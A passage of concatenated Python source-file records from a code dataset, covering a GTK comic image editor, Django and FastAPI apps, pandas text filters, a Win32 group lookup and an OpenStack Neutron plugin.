Gtk.IconView.new()\n self.iconview.set_property('item-width', 200)\n self.iconview.set_model(self.liststore)\n self.iconview.set_pixbuf_column(0)\n self.iconview.set_reorderable(True)\n\n for comicbox in self.comicboxes[1:]:\n self.liststore.append([comicbox.get_thumbnail()])\n\n self.add(self.iconview)\n\n def on_item_activated(self):\n model = self.iconview.get_model()\n pixbuf = model[self.iconview.get_selected_items()[0]][0]\n for comicbox in self.comicboxes[1:]:\n if pixbuf is comicbox.thumbnail:\n self.editor = ImageEditorView(comicbox)\n self.editor.show_all()\n break\n\n def reorder_comicboxs(self):\n sorted_list = []\n for row in self.liststore:\n for comicbox in self.comicboxes[1:]:\n if row[0] is comicbox.thumbnail:\n self.activity.page.table.remove(comicbox)\n sorted_list.append(comicbox)\n break\n sorted_list.insert(0, self.comicboxes[0])\n self.comicboxes = sorted_list\n self.activity.page.boxs = self.comicboxes\n\n def display_comicboxs(self):\n for i in range(0, len(self.comicboxes[1:])):\n reng = int(i / 2)\n column = i - (reng * 2)\n self.activity.page.table.attach(\n self.comicboxes[i + 1], column, column + 1, reng, reng + 1)\n\n\nclass ImageElement:\n def __init__(self, pixbuf, box, x, y, w, h):\n self.box = box\n self.pixbuf = pixbuf\n self.pixbuf_original = self.pixbuf.scale_simple(\n self.pixbuf.get_width(), self.pixbuf.get_height(),\n GdkPixbuf.InterpType.BILINEAR)\n self.x = x\n self.y = y\n self.width = w\n self.height = h\n self.calculate_boundaries()\n self.calculate_points()\n self.margin_x = 0\n self.margin_y = 0\n self.box_width = 0\n self.box_height = 0\n\n def reset(self):\n self.x = 0\n self.y = 0\n self.width = self.box_width\n self.height = self.box_height\n self.calculate_boundaries()\n self.calculate_points()\n\n def calculate_boundaries(self):\n self.boundaries = {}\n self.boundaries['min_x'] = self.x\n self.boundaries['max_x'] = self.x + self.width\n self.boundaries['min_y'] = self.y\n self.boundaries['max_y'] = self.y + self.height\n\n def calculate_points(self):\n self.points = {}\n self.points[\"upper_left\"] = [self.x, self.y]\n self.points[\"upper_right\"] = [self.x + self.width - HANDLE_SIZE,\n self.y]\n self.points[\"lower_left\"] = [self.x,\n self.y + self.height - HANDLE_SIZE]\n self.points[\"lower_right\"] = [self.x + self.width - HANDLE_SIZE,\n self.y + self.height - HANDLE_SIZE]\n\n def is_selected(self, x, y):\n # substract the margin values\n x = x - self.margin_x\n y = y - self.margin_y\n\n if (x >= self.boundaries['min_x'] and\n x <= self.boundaries['max_x']) and \\\n (y >= self.boundaries['min_y'] and\n y <= self.boundaries['max_y']):\n return True\n else:\n return False\n\n def is_resize(self, x, y):\n if self.is_in_point(x, y):\n return True\n else:\n return False\n\n def is_in_point(self, x, y, point=None):\n if point is not None:\n # substract the margin values\n x = x - self.margin_x\n y = y - self.margin_y\n\n if (x >= point[0] and x <= (point[0] + HANDLE_SIZE)) \\\n and (y >= point[1] and y <= (point[1] + HANDLE_SIZE)):\n return True\n else:\n return False\n else:\n if self.is_in_point(x, y, self.points[\"upper_left\"]) or \\\n self.is_in_point(x, y, self.points[\"upper_right\"]) or \\\n self.is_in_point(x, y, self.points[\"lower_left\"]) or \\\n self.is_in_point(x, y, self.points[\"lower_right\"]):\n return True\n else:\n return False\n\n def draw(self, ctx):\n self.image = ctx.get_target().create_similar(\n cairo.CONTENT_COLOR_ALPHA, self.box.width,\n self.box.height)\n pixb_scaled = self.pixbuf_original.scale_simple(\n self.width, self.height, GdkPixbuf.InterpType.BILINEAR)\n ct = cairo.Context(self.image)\n Gdk.cairo_set_source_pixbuf(ct, pixb_scaled, self.x, self.y)\n ct.paint()\n self.pixbuf = pixb_scaled\n\n ctx.save()\n ctx.translate(self.margin_x, self.margin_y)\n ctx.rectangle(0, 0, self.box.width, self.box.height)\n ctx.clip()\n ctx.set_source_surface(self.image, 0, 0)\n ctx.paint()\n ctx.restore()\n\n # draw the box border\n ctx.save()\n ctx.rectangle(self.margin_x, self.margin_y, self.box_width,\n self.box_height)\n ctx.set_source_rgb(0, 0, 0)\n ctx.stroke()\n ctx.restore()\n\n # draw the image border\n ctx.save()\n ctx.translate(self.margin_x, self.margin_y)\n ctx.set_line_width(2)\n ctx.set_source_rgb(1, 1, 1)\n ctx.rectangle(self.x, self.y, self.width, self.height)\n ctx.stroke_preserve()\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_dash([2])\n ctx.stroke()\n ctx.restore()\n\n # draw hadles\n self._draw_handle(ctx, self.x, self.y)\n self._draw_handle(ctx, self.x + self.width - HANDLE_SIZE, self.y)\n self._draw_handle(ctx, self.x, self.y + self.height - HANDLE_SIZE)\n self._draw_handle(ctx, self.x + self.width - HANDLE_SIZE,\n self.y + self.height - HANDLE_SIZE)\n\n def _draw_handle(self, ctx, x, y):\n ctx.save()\n ctx.translate(self.margin_x, self.margin_y)\n ctx.set_line_width(2)\n ctx.set_source_rgb(1, 1, 1)\n ctx.rectangle(x, y, HANDLE_SIZE, HANDLE_SIZE)\n ctx.stroke_preserve()\n ctx.set_source_rgb(0, 0, 0)\n ctx.set_dash([2])\n ctx.stroke()\n ctx.restore()\n\n def move(self, x_movement, y_movement, allocation):\n self.x = self.x + x_movement\n self.y = self.y + y_movement\n if self.x + self.width > allocation.width:\n self.x -= (self.x + self.width) - (allocation.width)\n\n if self.y + self.height > allocation.height:\n self.y -= (self.y + self.height) - (allocation.height)\n\n self.calculate_boundaries()\n self.calculate_points()\n\n def resize(self, x_movement, y_movement, allocation, start_x, start_y):\n\n if self.is_in_point(start_x, start_y, self.points[\"lower_left\"]):\n self.x += x_movement\n self.width -= x_movement\n self.height += y_movement\n elif self.is_in_point(start_x, start_y, self.points[\"upper_right\"]):\n self.y += y_movement\n self.height -= y_movement\n self.width += x_movement\n elif self.is_in_point(start_x, start_y, self.points[\"upper_left\"]):\n self.y += y_movement\n self.x += x_movement\n self.width -= x_movement\n self.height -= y_movement\n else:\n self.height += y_movement\n self.width += x_movement\n\n if self.width < MIN_IMAGE_SIZE:\n self.width = MIN_IMAGE_SIZE\n if self.height < MIN_IMAGE_SIZE:\n self.height = MIN_IMAGE_SIZE\n\n if self.x + self.width > allocation.width:\n self.width -= (self.x + self.width) - (allocation.width)\n\n if self.y + self.height > allocation.height:\n self.height -= (self.y + self.height) - (allocation.height)\n\n self.calculate_boundaries()\n self.calculate_points()\n\n\nclass CanvasEditor(Gtk.EventBox):\n def __init__(self, comicbox, width, height, window):\n Gtk.EventBox.__init__(self)\n\n self.width = width\n self.height = height\n self.is_resize = False\n self.is_move = False\n self.parentw = window\n\n self.modify_bg(Gtk.StateType.NORMAL,\n style.COLOR_WHITE.get_gdk_color())\n self._drawingarea = Gtk.DrawingArea()\n self.add(self._drawingarea)\n\n self._drawingarea.add_events(\n Gdk.EventMask.POINTER_MOTION_MASK |\n Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK |\n Gdk.EventMask.BUTTON_MOTION_MASK)\n\n self.image = ImageElement(\n comicbox.pixbuf, self,\n comicbox.img_x, comicbox.img_y,\n comicbox.img_w, comicbox.img_h)\n\n self._drawingarea.connect(\"draw\", self.draw_cb)\n self.connect(\"button_press_event\", self.pressing)\n self.connect(\"motion_notify_event\", self.mouse_move)\n self.connect(\"motion_notify_event\", self.moving)\n self.connect(\"button_release_event\", self.releassing)\n self.redraw()\n\n def size_allocate(widget, allocation):\n self._drawingarea.set_size_request(allocation.width,\n allocation.height)\n self.image.margin_x = (allocation.width - self.width) // 2\n self.image.margin_y = (allocation.height - self.height) // 2\n self.image.box_width = self.width\n self.image.box_height = self.height\n\n self.connect('size_allocate', size_allocate)\n self.set_size_request(self.width, self.height)\n self._drawingarea.set_size_request(self.width, self.height)\n self.show_all()\n\n def redraw(self):\n self._drawingarea.queue_draw()\n\n def draw_cb(self, widget, context):\n self.image.draw(context)\n\n def pressing(self, widget, event):\n if self.image.is_selected(event.x, event.y):\n if self.image.is_in_point(event.x, event.y):\n self.is_resize = True\n self.is_move = False\n else:\n self.is_resize = False\n self.is_move = True\n self.start_x = event.x\n self.start_y = event.y\n\n def mouse_move(self, widget, event):\n cursor = None\n if self.image.is_in_point(event.x, event.y,\n self.image.points[\"upper_left\"]) or \\\n self.image.is_in_point(event.x, event.y,\n self.image.points[\"lower_right\"]):\n cursor = Gdk.Cursor(Gdk.CursorType.BOTTOM_RIGHT_CORNER)\n elif self.image.is_in_point(event.x, event.y,\n self.image.points[\"upper_right\"]) or \\\n self.image.is_in_point(event.x, event.y,\n self.image.points[\"lower_left\"]):\n cursor = Gdk.Cursor(Gdk.CursorType.BOTTOM_LEFT_CORNER)\n elif self.image.is_selected(event.x, event.y):\n cursor = Gdk.Cursor(Gdk.CursorType.FLEUR)\n self.get_window().set_cursor(cursor)\n\n def moving(self, widget, event):\n if self.is_move:\n x_movement = event.x - self.start_x\n y_movement = event.y - self.start_y\n self.image.move(x_movement, y_movement, self.get_allocation())\n self.start_x = event.x\n self.start_y = event.y\n self.redraw()\n elif self.is_resize:\n x_movement = event.x - self.start_x\n y_movement = event.y - self.start_y\n self.image.resize(x_movement, y_movement, self.get_allocation(),\n self.start_x, self.start_y)\n self.start_x = event.x\n self.start_y = event.y\n self.redraw()\n\n def releassing(self, widget, event):\n self.is_resize = False\n self.is_move = False\n self.start_x = -1\n self.start_y = -1\n\n def reset(self):\n self.image.reset()\n self.redraw()\n\n\nclass ImageEditorView(BaseWindow):\n\n def __init__(self, comicbox):\n BaseWindow.__init__(self)\n\n self.toolbar = BasicToolbar('contract-coordinates')\n self.toolbar.stop.connect('clicked', self.__stop_clicked_cb)\n self.toolbar.confirm.connect('clicked', self.__ok_clicked_cb)\n\n reset_size = ToolButton(icon_name='box-size')\n reset_size.set_tooltip(_('Reset to box size'))\n self.toolbar.insert(reset_size, 3)\n reset_size.show()\n reset_size.connect('clicked', self.__reset_size_cb)\n\n self.comicbox = comicbox\n self.canvas = CanvasEditor(\n self.comicbox, self.comicbox.width,\n self.comicbox.height, self)\n\n label = Gtk.Label('')\n title = _('Drag to move or resize using the marked corners')\n label.set_markup('<span size=\"x-large\">%s</span>' % title)\n\n self.vbox = Gtk.VBox()\n self.vbox.pack_start(self.toolbar, False, False, 0)\n self.vbox.pack_start(label, False, False, style.DEFAULT_SPACING)\n self.vbox.pack_start(self.canvas, True, True, 0)\n self.add(self.vbox)\n self.modify_bg(Gtk.StateType.NORMAL,\n style.COLOR_WHITE.get_gdk_color())\n\n def __reset_size_cb(self, button):\n self.canvas.reset()\n\n def __stop_clicked_cb(self, button):\n self.destroy()\n\n def __ok_clicked_cb(self, button):\n self.comicbox.img_x = self.canvas.image.x\n self.comicbox.img_y = self.canvas.image.y\n self.comicbox.img_w = self.canvas.image.width\n self.comicbox.img_h = self.canvas.image.height\n self.comicbox.redraw()\n self.destroy()\n","sub_path":"reorderwindow.py","file_name":"reorderwindow.py","file_ext":"py","file_size_in_byte":16856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"7893126","text":"# coding: utf-8\nfrom __future__ import unicode_literals\nimport requests\n\nfrom datetime import date\nfrom .models import Holiday\n\n\n\nclass HolidayUpdater(object):\n BASE_URL = 'http://nolaborables.com.ar/API/v1/'\n\n ConnectionError = requests.ConnectionError\n\n def __init__(self, year=None):\n self.year = year or date.today().year\n\n def update(self):\n # Response is of type:\n # [{\"dia\":1,\"mes\":1,\"motivo\":\"Año Nuevo\",\"tipo\":\"inamovible\"}, ...]\n\n url = self.BASE_URL + unicode(self.year)\n data = requests.get(url, params={'excluir': 'opcional'}).json()\n\n added = 0\n for item in data:\n if 'traslado' in item:\n day = date(self.year, item['mes'], item['traslado'])\n else:\n day = date(self.year, item['mes'], item['dia'])\n\n if Holiday.objects.filter(date=day).exists():\n continue\n\n Holiday.objects.create(\n date=day, description=item.get('motivo', '')\n )\n added += 1\n return added\n","sub_path":"bookings/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"49079391","text":"\"\"\"\nContains the code that sets up the API.\n\"\"\"\n\nfrom typing import Dict\n\nimport uvicorn\nfrom fastapi import FastAPI\n\nfrom fidesapi import crud, db_session, visualize\nfrom fidesctl.core.config import get_config\n\napp = FastAPI(title=\"fidesctl\")\n\n\ndef configure_routes() -> None:\n \"Include all of the routers not defined here.\"\n for router in crud.routers:\n app.include_router(router)\n # add router for the category viz endpoints\n for router in visualize.routers:\n app.include_router(router)\n\n\ndef configure_db(database_url: str) -> None:\n \"Set up the db to be used by the app.\"\n db_session.global_init(database_url)\n\n\n@app.get(\"/health\", tags=[\"Health\"])\nasync def health() -> Dict:\n \"Confirm that the API is running and healthy.\"\n return {\"data\": {\"message\": \"Fides service is healthy!\"}}\n\n\ndef start_webserver() -> None:\n \"Run the webserver.\"\n uvicorn.run(app, host=\"0.0.0.0\", port=8080)\n\n\nconfig = get_config()\nconfigure_routes()\nconfigure_db(config.api.database_url)\n","sub_path":"fidesctl/src/fidesapi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"331794674","text":"import pandas as pd\nimport ast\n\ndef slicePolitiek(querystring='', date=''):\n\t''' Slices and returns the TK handelingen\n\tdata as a pandas DataFrame either based on\n\twhether it contains a string or has a specific\n\tdate. '''\n\n\tdf = pd.read_csv('data/politiek/handelingen/all-handelingen.csv')\n\n\tif isinstance(querystring, list):\n\t\tquerystring = '|'.join(querystring)\n\n\tif querystring != '':\n\t\tdf = df[df['tekst'].str.contains(querystring, na=False, case=False)]\n\n\tif date != '':\n\t\tdf = df[df['datum'].str.contains(date, na=False, case=False)]\n\n\treturn df\n\ndef filterKrant(file, year, word):\n\t''' Filters a newspaper dataset on year/string'''\n\n\tdf = pd.read_csv(file)\n\tdf = df[df['full_text'].str.contains(word, na=False, case=False)]\n\n\tif isinstance(year, list):\n\t\tyear = '|'.join(str(single_year) for single_year in year)\n\telif isinstance(year, int):\n\t\tyear = str(year)\n\n\tdf = df[df['date_formatted'].str.contains(year)]\n\treturn(df)\n\ndef deduplicateKrant(file):\n\t''' Deduplicates the rows from a newspaper csv.\n\tWrites a new file (original name + -deduplicated)'''\n\n\tdf = pd.read_csv(file)\n\n\tli_dropindex = []\n\n\tfor index, row in df.iterrows():\n\t\tif index == 0:\n\t\t\tprev_row = row\n\t\telif index > 0:\n\t\t\tif str(row['author']) == str(prev_row['author']) and str(row['pagina']) == str(prev_row['pagina']) and row['date'] == prev_row['date']:\n\t\t\t\tif len(ast.literal_eval(row['tokens'])) > 4 and len(ast.literal_eval(prev_row['tokens'])) > 4:\n\t\t\t\t\tif (ast.literal_eval(row['tokens'])[2][:10] == ast.literal_eval(prev_row['tokens'])[2][:10]) and (ast.literal_eval(row['tokens'])[4][:10] == ast.literal_eval(prev_row['tokens'])[4][:10]):\n\t\t\t\t\t\tprint('equals')\n\t\t\t\t\t\tprint(str(row['title'])[:10], str(prev_row['title'])[:10])\n\t\t\t\t\t\tprint(ast.literal_eval(row['tokens'])[2][:10], ast.literal_eval(prev_row['tokens'])[2][:10])\n\t\t\t\t\t\tprint(ast.literal_eval(row['tokens'])[4][:10], ast.literal_eval(prev_row['tokens'])[4][:10])\n\t\t\t\t\t\tli_dropindex.append(index)\n\t\t\tprev_row = row\n\n\tdf = df.drop(df.index[li_dropindex])\n\tdf.to_csv(file[:-4] + '-deduplicated.csv')\n\n\nif __name__ == '__main__':\n\n\tdeduplicateKrant('data/media/kranten/all-racisme-racistisch-racist-withtokens.csv')","sub_path":"racisme-in-nederland/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"395440005","text":"import pandas as pd\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom dataset import get_data\n\n\ndf_yelp = get_data(['yelp', 'amazon', 'imdb'])\nsentences = df_yelp['sentence'].values\ny = df_yelp['label'].values\n\n(sentences_train,\n sentences_test,\n y_train,\n y_test) = train_test_split(sentences,\n y,\n test_size=0.25,\n random_state=1000)\n\nvectorizer = CountVectorizer()\nvectorizer.fit(sentences_train)\nX_train = vectorizer.transform(sentences_train)\nX_test = vectorizer.transform(sentences_test)\n\nclassifier = LogisticRegression()\nclassifier.fit(X_train, y_train)\nscore = classifier.score(X_test, y_test)\n\nprint(\"Accuracy\", score)\n","sub_path":"cnn/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"31112252","text":"#!/usr/bin/python\n\n# [(groupName, attribute), ...] = NetUserGetGroups(serverName, userName )\n# Returns a list of groups,attributes for all groups for the user.\n\n# >>> win32net.NetUserGetGroups(None,\"rchateau\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetGroups(\"TITI\",\"vero\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetGroups(\"TITI\",\"guest\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetGroups(\"TITI\",\"guest\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetLocalGroups(\"TITI\",\"guest\")\n# [u'Guests']\n# >>> win32net.NetUserGetLocalGroups(\"TITI\",\"vero\")\n# [u'HomeUsers', u'Users']\n# >>> win32net.NetUserGetLocalGroups(None,\"rchateau\")\n# [u'HomeUsers', u'ORA_DBA', u'TelnetClients', u'Administrators', u'Performance Log Users']\n# >>> win32net.NetUserGetGroups(\"Titi\",\"rchat_000\")\n# [(u'None', 7)]\n# >>> win32net.NetUserGetLocalGroups(\"Titi\",\"rchat_000\")\n# [u'HomeUsers', u'Administrators', u'Performance Log Users']\n\n\n\n\n\"\"\"\nGroups of a Windows user\n\"\"\"\n\nimport sys\nimport lib_util\nimport lib_common\nfrom lib_properties import pc\nimport lib_win32\n\nimport win32net\n\nfrom sources_types import Win32_Group as survol_Win32_Group\nfrom sources_types import Win32_UserAccount as survol_Win32_UserAccount\n\nUsable = lib_util.UsableWindows\n\nCanProcessRemote = True\n\ndef Main():\n\tcgiEnv = lib_common.CgiEnv(can_process_remote = True)\n\n\ttry:\n\t\t# Exception if local machine.\n\t\thostName = cgiEnv.m_entity_id_dict[\"Domain\"]\n\texcept KeyError:\n\t\thostName = None\n\n\tif not hostName or lib_util.IsLocalAddress( hostName ):\n\t\tserverBox = lib_common.gUriGen\n\t\tserverNode = lib_common.nodeMachine\n\t\tservName_or_None = None\n\telse:\n\t\tserverBox = lib_common.RemoteBox(hostName)\n\t\tserverNode = lib_common.gUriGen.HostnameUri(hostName)\n\t\tservName_or_None = hostName\n\n\t\t# hostname = \"Titi\" for example\n\t\ttry:\n\t\t\tlib_win32.WNetAddConnect(hostName)\n\t\texcept:\n\t\t\tlib_common.ErrorMessageHtml(\"Error WNetAddConnect %s:%s\"%(hostName,str(sys.exc_info())))\n\n\n\tuserName = cgiEnv.m_entity_id_dict[\"Name\"]\n\n\tsys.stderr.write(\"hostName=%s userName=%s\\n\" %(hostName,userName))\n\n\tgrph = cgiEnv.GetGraph()\n\n\tnodeUser = survol_Win32_UserAccount.MakeUri( userName, hostName )\n\n\t# TODO: Quid de NetUserGetGroups ??\n\n\t# [(groupName, attribute), ...] = NetUserGetGroups(serverName, userName )\n\ttry:\n\t\tresuList = win32net.NetUserGetLocalGroups(servName_or_None,userName)\n\texcept:\n\t\tlib_common.ErrorMessageHtml(\"Error:\"+str(sys.exc_info()))\n\n\tfor groupName in resuList:\n\t\tnodeGroup = survol_Win32_Group.MakeUri( groupName, hostName )\n\t\tgrph.add( ( nodeUser, pc.property_group, nodeGroup ) )\n\n\t\tif hostName:\n\t\t\tnodeGroupRemote = serverBox.UriMakeFromDict(\"Win32_Group\", { \"Name\" : groupName, \"Domain\" : hostName } )\n\t\t\t# TODO: Instead, both object must have the same universal alias\n\t\t\tgrph.add( (nodeGroup, pc.property_alias, nodeGroupRemote ) )\n\n\n\n\tcgiEnv.OutCgiRdf()\n\nif __name__ == '__main__':\n\tMain()\n\n\n","sub_path":"survol/sources_types/Win32_UserAccount/Win32_NetUserGetGroups.py","file_name":"Win32_NetUserGetGroups.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"210411422","text":"import pygame\n\nclass Image:\n def __init__(self, images):\n # pygame.sprite.Sprite.__init__(self)\n\n self.images = []\n\n if (images!=list()):\n self.images.append(images)\n else:\n for image in images:\n self.images.append(image)\n\n self.image = self.images[0]\n\n self.width = self.image.get_width()\n self.height = self.image.get_height()\n\n self.mwidth = self.width//2\n self.mheight = self.height//2\n\n self.index = 0\n self.length = len(self.images)\n\n def rotate(self, original_image, angle):\n img = pygame.transform.rotate(original_image, int(angle))\n return img\n\n def update(self):\n self.index+=1\n self.image = self.images[self.index]\n\n def draw(self, angle, win, x, y):\n img = self.rotate(self.image, angle)\n a = (img.get_width() - self.width) // 2\n b = (img.get_height() - self.height) // 2\n\n win.blit(img, (x - self.mwidth - a, y - self.mheight - b))\n # win.blit(img, (MWIDTH - 16 - a, MHEIGHT - 16 - b))\n\n# a = Image( pygame.image.frombuffer(Images.Images.arrow, (7, 16), 'RGBA'))","sub_path":"client/classes/Image.py","file_name":"Image.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"195640730","text":"# Copyright 2015-2016 NEC Corporation. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron.api.rpc.handlers import dhcp_rpc\nfrom neutron.api.rpc.handlers import metadata_rpc\nfrom neutron.api.rpc.handlers import securitygroups_rpc\nfrom neutron.common import rpc as n_rpc\nfrom neutron.common import topics\nfrom neutron.db import agents_db\nfrom neutron.extensions import multiprovidernet as mpnet\nfrom neutron.extensions import providernet as provider\nfrom neutron.plugins.ml2 import db as db_ml2\nfrom neutron.plugins.ml2 import driver_api as api\nfrom neutron.plugins.ml2 import plugin as ml2_plugin\nfrom oslo_log import log as logging\n\nfrom networking_nec.i18n import _LE, _LI, _LW\nfrom networking_nec.nwa.common import constants as nwa_const\nfrom networking_nec.nwa.l2 import db_api as necnwa_api\nfrom networking_nec.nwa.l2.rpc import ml2_server_callback\nfrom networking_nec.nwa.l2.rpc import nwa_agent_api\nfrom networking_nec.nwa.l2.rpc import nwa_l2_server_callback\nfrom networking_nec.nwa.l2.rpc import nwa_proxy_api\nfrom networking_nec.nwa.l2.rpc import tenant_binding_callback\n\nLOG = logging.getLogger(__name__)\n\n\nclass NECNWAL2Plugin(ml2_plugin.Ml2Plugin):\n\n def __init__(self):\n super(NECNWAL2Plugin, self).__init__()\n self._nwa_agent_rpc_setup()\n\n def _nwa_agent_rpc_setup(self):\n self.nwa_rpc = nwa_agent_api.NECNWAAgentApi(\n nwa_const.NWA_AGENT_TOPIC\n )\n self.nwa_proxies = {}\n\n def start_rpc_listeners(self):\n self.endpoints = [\n ml2_server_callback.NwaML2ServerRpcCallbacks(\n self.notifier, self.type_manager),\n nwa_l2_server_callback.NwaL2ServerRpcCallback(),\n tenant_binding_callback.TenantBindingServerRpcCallback(),\n securitygroups_rpc.SecurityGroupServerRpcCallback(),\n dhcp_rpc.DhcpRpcCallback(),\n agents_db.AgentExtRpcCallback(),\n metadata_rpc.MetadataRpcCallback()]\n\n self.topic = topics.PLUGIN\n self.conn = n_rpc.create_connection()\n self.conn.create_consumer(self.topic, self.endpoints,\n fanout=False)\n return self.conn.consume_in_threads()\n\n def _extend_network_dict_provider(self, context, network):\n if 'id' not in network:\n LOG.debug(\"Network has no id\")\n network[provider.NETWORK_TYPE] = None\n network[provider.PHYSICAL_NETWORK] = None\n network[provider.SEGMENTATION_ID] = None\n return\n\n net_id = network['id']\n segments = db_ml2.get_network_segments(\n context.session, net_id, filter_dynamic=True)\n\n if not segments:\n LOG.debug(\"Network %s has no segments\", net_id)\n network[provider.NETWORK_TYPE] = None\n network[provider.PHYSICAL_NETWORK] = None\n network[provider.SEGMENTATION_ID] = None\n elif len(segments) > 1:\n network[mpnet.SEGMENTS] = [\n {provider.NETWORK_TYPE: segment[api.NETWORK_TYPE],\n provider.PHYSICAL_NETWORK: segment[api.PHYSICAL_NETWORK],\n provider.SEGMENTATION_ID: segment[api.SEGMENTATION_ID]}\n for segment in segments]\n else:\n segment = segments[0]\n network[provider.NETWORK_TYPE] = segment[api.NETWORK_TYPE]\n network[provider.PHYSICAL_NETWORK] = segment[api.PHYSICAL_NETWORK]\n network[provider.SEGMENTATION_ID] = segment[api.SEGMENTATION_ID]\n\n # pylint: disable=redefined-builtin\n def get_network(self, context, id, fields=None):\n session = context.session\n\n with session.begin(subtransactions=True):\n network = self._get_network(context, id)\n result = self._make_network_dict(network, fields)\n self._extend_network_dict_provider(context, result)\n\n return self._fields(result, fields)\n\n def get_networks(self, context, filters=None, fields=None,\n sorts=None, limit=None, marker=None, page_reverse=False):\n return super(\n NECNWAL2Plugin,\n self\n ).get_networks(context, filters, None, sorts,\n limit, marker, page_reverse)\n\n def _create_nwa_agent_tenant_queue(self, context, tenant_id):\n if (\n self._is_alive_nwa_agent(context) and\n necnwa_api.get_nwa_tenant_queue(\n context.session,\n tenant_id\n ) is None\n ):\n self.nwa_rpc.create_server(context, tenant_id)\n necnwa_api.add_nwa_tenant_queue(context.session, tenant_id)\n else:\n LOG.warning(_LW('%s is not alive.'),\n nwa_const.NWA_AGENT_TYPE)\n\n def create_network(self, context, network):\n result = super(NECNWAL2Plugin,\n self).create_network(context, network)\n self._create_nwa_agent_tenant_queue(context, context.tenant_id)\n return result\n\n def delete_network(self, context, id):\n result = super(NECNWAL2Plugin,\n self).delete_network(context, id)\n return result\n\n def create_port(self, context, port):\n result = super(NECNWAL2Plugin,\n self).create_port(context, port)\n\n return result\n\n def get_nwa_topics(self, context, tid):\n rss = self.nwa_rpc.get_nwa_rpc_servers(context)\n if isinstance(rss, dict) and rss.get('nwa_rpc_servers'):\n return [t.get('topic') for t in rss['nwa_rpc_servers']\n if t.get('tenant_id') == tid]\n else:\n return []\n\n def get_nwa_proxy(self, tid, context=None):\n if tid not in self.nwa_proxies:\n self.nwa_proxies[tid] = nwa_proxy_api.NECNWAProxyApi(\n nwa_const.NWA_AGENT_TOPIC, tid\n )\n if context:\n self._create_nwa_agent_tenant_queue(context, tid)\n nwa_topics = self.get_nwa_topics(context, tid)\n if len(nwa_topics) == 1:\n LOG.info(_LI('NWA tenant queue: new topic is %s'),\n str(nwa_topics[0]))\n else:\n LOG.warning(_LW('NWA tenant queue is not created. tid=%s'),\n tid)\n LOG.debug('proxy tid=%s', tid)\n return self.nwa_proxies[tid]\n\n def _is_alive_nwa_agent(self, context):\n agents = self.get_agents(\n context,\n filters={'agent_type': [nwa_const.NWA_AGENT_TYPE]}\n )\n return any(agent['alive'] for agent in agents)\n\n # This needs to be defined to avoid pylint abstract-method check.\n def get_port_from_device(self, context, device):\n LOG.error(_LE('This method should not be called. '\n 'get_ports_from_devices is used.'))\n","sub_path":"networking_nec/nwa/l2/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":7384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"401499699","text":"from django import forms\nfrom .models import Discipline,Note\nfrom registration.models import Classe,Eleve\nfrom staff.models import Enseignant\nclass remplir_noteForm(forms.ModelForm):\n class Meta:\n model=Note\n\n\n fields=[\n\n 'eleve',\n 'discipline',\n 'evaluation1',\n 'evaluation2',\n ]\n\nclass ajouter_disciplineForm(forms.ModelForm):\n class Meta:\n model=Discipline\n\n\n fields=[\n\n 'intitule',\n 'coef',\n 'enseignant',\n 'classe',\n ]\nclass BulletinForm(forms.Form):\n matiere=forms.ModelMultipleChoiceField(queryset=Discipline.objects.all(),widget=forms.CheckboxSelectMultiple)\n classe= forms.ModelMultipleChoiceField(queryset=Classe.objects.all(), widget=forms.CheckboxSelectMultiple)\n enseignant = forms.ModelMultipleChoiceField(queryset=Enseignant.objects.all(), widget=forms.CheckboxSelectMultiple)\n eleve = forms.ModelMultipleChoiceField(queryset=Eleve.objects.all(), widget=forms.CheckboxSelectMultiple)\n coef=forms.IntegerField(label='coefficient',initial='Coef',widget=forms.TextInput(attrs={\n 'class':'form-control',\n 'placeholder':'Coef'\n }))\n note_I=forms.FloatField(label='note evaluation I',initial='note 1')\n note_II = forms.FloatField(label='note evaluation II', initial='note 2')\n","sub_path":"report_card/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"178977396","text":"\ndef 写入日志(msg):\n import logging\n kwargs = {\n \"filename\": \"logs.txt\",\n \"format\": \"%(asctime)s - %(message)s\"\n }\n logger = logging.getLogger()\n fh = logging.FileHandler(\"test.log\",encoding=\"utf-8\",mode=\"a\")\n formatter = logging.Formatter(\"%(asctime)s - %(message)s\")\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n logger.setLevel(logging.DEBUG)\n logger.warning(msg)\n\nif 